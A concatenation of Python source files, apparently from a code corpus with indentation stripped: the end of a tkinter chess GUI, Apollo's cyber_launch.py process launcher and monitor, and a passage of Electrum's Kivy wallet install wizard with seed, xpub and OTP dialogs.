filename = "img/%s%s.png" % (piece.color, piece.abbriviation.lower())
piecename = "%s%s%s" % (piece.abbriviation, x, y)
if(filename not in self.icons):
self.icons[filename] = ImageTk.PhotoImage(file=filename, width=32, height=32)
self.addpiece(piecename, self.icons[filename], x, y)
self.placepiece(piecename, x, y)
def move_engine(self):
# print "in move_engine"
global turn
if turn is 1:
self.chessboard.make_move("black")
self.pieces = {}
self.refresh()
self.draw_pieces()
turn = 0
def reset(self):
# print "reset"
self.chessboard.load(board.FEN_STARTING)
self.refresh()
self.draw_pieces()
self.refresh()
def display(chessboard):
# print "display"
root = tk.Tk()
root.title("Chess Engine")
gui = BoardGuiTk(root, chessboard)
gui.pack(side="top", fill="both", expand="true", padx=4, pady=4)
gui.draw_pieces()
# print "drawn"
# time.sleep(1)
# print "slept"
# gui.move_engine()
# print "called"
# gui.pack(side="top", fill="both", expand="true", padx=4, pady=4)
# gui.draw_pieces()
root.mainloop()
if __name__ == "__main__":
display()
|
cyber_launch.py | #!/usr/bin/env python3
# ****************************************************************************
# Copyright 2018 The Apollo Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
import argparse
import atexit
import logging
import os
import os.path
import signal
import subprocess
import sys
import time
import threading
import traceback
import xml.etree.ElementTree as ET
g_binary_name = 'mainboard'
g_pwd = os.getcwd()
g_script_name = os.path.basename(sys.argv[0]).split(".")[0]
g_process_pid = os.getpid()
g_process_name = g_script_name + "_" + str(g_process_pid)
cyber_path = os.getenv('CYBER_PATH')
"""
colorful logging
"""
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
COLORS = {
'INFO': GREEN,
'WARNING': YELLOW,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': YELLOW
}
class ColoredFormatter(logging.Formatter):
def __init__(self, msg):
logging.Formatter.__init__(self, msg)
def format(self, record):
levelname = record.levelname
if levelname in COLORS:
if levelname == 'DEBUG':
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[0] + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[-1] + RESET_SEQ
else:
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
g_process_name + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + \
" " + record.msg.split('#')[-1] + RESET_SEQ
return logging.Formatter.format(self, record)
color_formatter = ColoredFormatter("[%(levelname)-18s] %(message)s")
console = logging.StreamHandler()
console.setFormatter(color_formatter)
logger = logging.Logger(__name__)
logger.addHandler(console)
def exit_handler():
stop()
os.chdir(g_pwd)
logger.info('cyber_launch exit.')
atexit.register(exit_handler)
def singleton(cls):
instances = {}
def getinstance(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return getinstance
def module_monitor(mod):
while True:
line = mod.popen.stdout.readline()
if line:
logger.debug('%s# %s' % (mod.name, line.decode('utf8').strip('\n')))
continue
time.sleep(0.01)
class ProcessWrapper(object):
def __init__(self, binary_path, dag_num, dag_list, process_name,
process_type, sched_name, exception_handler=''):
self.time_of_death = None
self.started = False
self.binary_path = binary_path
self.dag_num = dag_num
self.dag_list = dag_list
self.name = process_name
self.sched_name = sched_name
self.process_type = process_type
self.popen = None
self.exit_code = None
self.args = []
self.pid = -1
self.exception_handler = exception_handler
def wait(self):
if self.started:
self.popen.wait()
def start(self):
"""
Start a manager in process name
"""
if self.process_type == 'binary':
args_list = self.name.split()
else:
args_list = [self.binary_path, '-d'] + self.dag_list
if len(self.name) != 0:
args_list.append('-p')
args_list.append(self.name)
if len(self.sched_name) != 0:
args_list.append('-s')
args_list.append(self.sched_name)
self.args = args_list
try:
self.popen = subprocess.Popen(args_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except Exception as err:
logger.error('Subprocess Popen exception: ' + str(err))
return 2
else:
if self.popen.pid == 0 or self.popen.returncode is not None:
logger.error('Start process [%s] failed.' % self.name)
return 2
th = threading.Thread(target=module_monitor, args=(self, ))
th.setDaemon(True)
th.start()
self.started = True
self.pid = self.popen.pid
logger.info('Start process [%s] successfully. pid: %d' %
(self.name, self.popen.pid))
logger.info('-' * 120)
return 0
def is_alive(self):
"""
Check the process if is still running
@return: True if process is still running
@rtype: bool
"""
if not self.started:
return False
if self.popen is None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
self.exit_code = self.popen.poll()
if self.exit_code is not None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
return True
def get_exit_state(self):
"""
@return: description of exit state
@rtype: str
"""
if self.popen.returncode is None:
pass
elif self.popen.returncode != 0:
output = 'Process [%s] has died [pid %s, exit code %s, cmd %s].' % \
(self.name, self.pid, self.exit_code, ' '.join(self.args))
logger.error(output)
else:
output = 'Process [%s] has finished. [pid %s, cmd %s].' % \
(self.name, self.pid, ' '.join(self.args))
logger.error(output)
@singleton
class ProcessMonitor(object):
def __init__(self):
self.procs = []
self.dead_cnt = 0
self.done = False
self.is_shutdown = False
def register(self, p):
"""
Register process with L{ProcessMonitor}
@param p: Process
@type p: L{Process}
"""
if self.has_process(p.name):
logger.error(
'Cannot add process due to duplicate name "%s".' % p.name)
elif self.is_shutdown:
logger.error(
'Cannot add process [%s] due to monitor has been stopped.' % p.name)
else:
self.procs.append(p)
def has_process(self, name):
"""
@return: True if process is still be monitored. If False, process
has died or was never registered with process
@rtype: bool
"""
return len([p for p in self.procs if p.name == name]) > 0
def check_cleanup(self):
"""
Check processes are alived, cleanup processes
"""
dead_cnt = 0
for pw in self.procs:
if self.is_shutdown:
break
if pw.process_type == 'binary':
continue
try:
if not pw.is_alive():
if pw.exception_handler == "respawn":
logger.warning(
'child process [%s][%d] exit, respawn!' % (pw.name, pw.pid))
result = pw.start()
if result != 0:
logger.error(
'respawn process [%s] failed, stop all!' % (pw.name))
stop()
elif pw.exception_handler == "exit":
logger.warning(
'child process [%s][%d] exit, stop all' % (pw.name, pw.pid))
stop()
dead_cnt += 1
except Exception:
dead_cnt += 1
traceback.print_exc()
if dead_cnt > 0:
self.dead_cnt = dead_cnt
if self.dead_cnt == len(self.procs):
self.is_shutdown = True
def run(self):
"""
Run processes monitor, until all processes are died.
"""
while not self.is_shutdown:
self.check_cleanup()
time.sleep(0.2)
for p in self.procs:
p.get_exit_state()
if self.dead_cnt == len(self.procs):
logger.info("All processes has died.")
return True
return False
def stop(self, signal):
"""
Stop all processes in monitor
"""
for p in self.procs:
if p.is_alive():
p.popen.send_signal(signal)
for p in self.procs:
if p.is_alive():
logger.warning('Waiting for [%s][%s] exit.' % (p.name, p.pid))
p.wait()
logger.info(
'Process [%s] has been stopped. dag_file: %s' % (p.name, p.dag_list))
# Reset members
self.procs = []
self.dead_cnt = 0
def start(launch_file=''):
"""
Start all modules in xml config
"""
pmon = ProcessMonitor()
# Find launch file
if launch_file[0] == '/':
launch_file = launch_file
elif launch_file == os.path.basename(launch_file):
launch_file = os.path.join(cyber_path, 'launch', launch_file)
else:
if os.path.exists(os.path.join(g_pwd, launch_file)):
launch_file = os.path.join(g_pwd, launch_file)
else:
logger.error('Cannot find launch file: %s ' % launch_file)
sys.exit(1)
logger.info('Launch file [%s]' % launch_file)
logger.info('=' * 120)
if not os.path.isfile(launch_file):
logger.error('Launch xml file %s does not exist' % launch_file)
sys.exit(1)
try:
tree = ET.parse(launch_file)
except Exception:
logger.error('Parse xml failed. illegal xml!')
sys.exit(1)
total_dag_num = 0
dictionary = {}
dag_dict = {}
root1 = tree.getroot()
for module in root1.findall('module'):
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
process_type = module.find('type')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if process_type != 'binary':
if dag_conf is None or not dag_conf.strip():
logger.error('Library dag conf is null')
continue
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
process_name = process_name.strip()
if str(process_name) in dictionary:
dictionary[str(process_name)] += 1
else:
dictionary[str(process_name)] = 1
if str(process_name) not in dag_dict:
dag_dict[str(process_name)] = [str(dag_conf)]
else:
dag_dict[str(process_name)].append(str(dag_conf))
if dag_conf is not None:
total_dag_num += 1
process_list = []
root = tree.getroot()
for env in root.findall('environment'):
for var in env.getchildren():
os.environ[var.tag] = str(var.text)
for module in root.findall('module'):
module_name = module.find('name').text
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
sched_name = module.find('sched_name')
process_type = module.find('type')
exception_handler = module.find('exception_handler')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if sched_name is None:
sched_name = "CYBER_DEFAULT"
else:
sched_name = sched_name.text
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
if dag_conf is None:
dag_conf = ''
if module_name is None:
module_name = ''
if exception_handler is None:
exception_handler = ''
else:
exception_handler = exception_handler.text
module_name = module_name.strip()
dag_conf = dag_conf.strip()
process_name = process_name.strip()
sched_name = sched_name.strip()
exception_handler = exception_handler.strip()
logger.info('Load module [%s] %s: [%s] [%s] conf: [%s] exception_handler: [%s]' %
(module_name, process_type, process_name, sched_name, dag_conf,
exception_handler))
if process_name not in process_list:
if process_type == 'binary':
if len(process_name) == 0:
logger.error(
'Start binary failed. Binary process_name is null.')
continue
pw = ProcessWrapper(
process_name.split()[0], 0, [
""], process_name, process_type,
exception_handler)
# Default is library
else:
pw = ProcessWrapper(
g_binary_name, 0, dag_dict[
str(process_name)], process_name,
process_type, sched_name, exception_handler)
result = pw.start()
if result != 0:
logger.error(
'Start manager [%s] failed. Stop all!' % process_name)
stop()
pmon.register(pw)
process_list.append(process_name)
# No module in xml
if not process_list:
logger.error("No module was found in xml config.")
return
all_died = pmon.run()
if not all_died:
logger.info("Stop all processes...")
stop()
logger.info("Cyber exit.")
def stop(sig=signal.SIGINT):
"""
stop all modules
"""
pmon = ProcessMonitor()
if len(pmon.procs) == 0:
return
pmon.stop(sig)
logger.info('All processes have been stopped.')
sys.exit(0)
def stop_launch(launch_file):
"""
Stop the launch file
"""
if not launch_file:
cmd = 'pkill -INT cyber_launch'
else:
cmd = 'pkill -INT -f ' + launch_file
os.system(cmd)
time.sleep(3)
logger.info('Stop cyber launch finished.')
sys.exit(0)
def signal_handler(sig, frame):
logger.info('Keyboard interrupt received. Stop all processes.')
stop(sig)
def main():
"""
Main function
"""
if cyber_path is None:
logger.error(
'Error: environment variable CYBER_PATH not found, set environment first.')
sys.exit(1)
os.chdir(cyber_path)
parser = argparse.ArgumentParser(description='cyber launcher')
subparsers = parser.add_subparsers(help='sub-command help')
start_parser = subparsers.add_parser(
'start', help='launch/benchmark.launch')
start_parser.add_argument('file', nargs='?', action='store',
help='launch file, default is cyber.launch')
stop_parser = subparsers.add_parser(
'stop', help='stop all the module in launch file')
stop_parser.add_argument('file', nargs='?', action='store',
help='launch file, default stop all the launcher')
# restart_parser = subparsers.add_parser('restart', help='restart the module')
# restart_parser.add_argument('file', nargs='?', action='store', help='launch file,
# default is cyber.launch')
params = parser.parse_args(sys.argv[1:])
command = sys.argv[1]
if command == 'start':
start(params.file)
elif command == 'stop':
stop_launch(params.file)
# elif command == 'restart':
# restart(params.file)
else:
logger.error('Invalid command %s' % command)
sys.exit(1)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
main()
|
installwizard.py |
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
os.unlink(self.wizard.storage.path)
self.wizard.terminate()
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
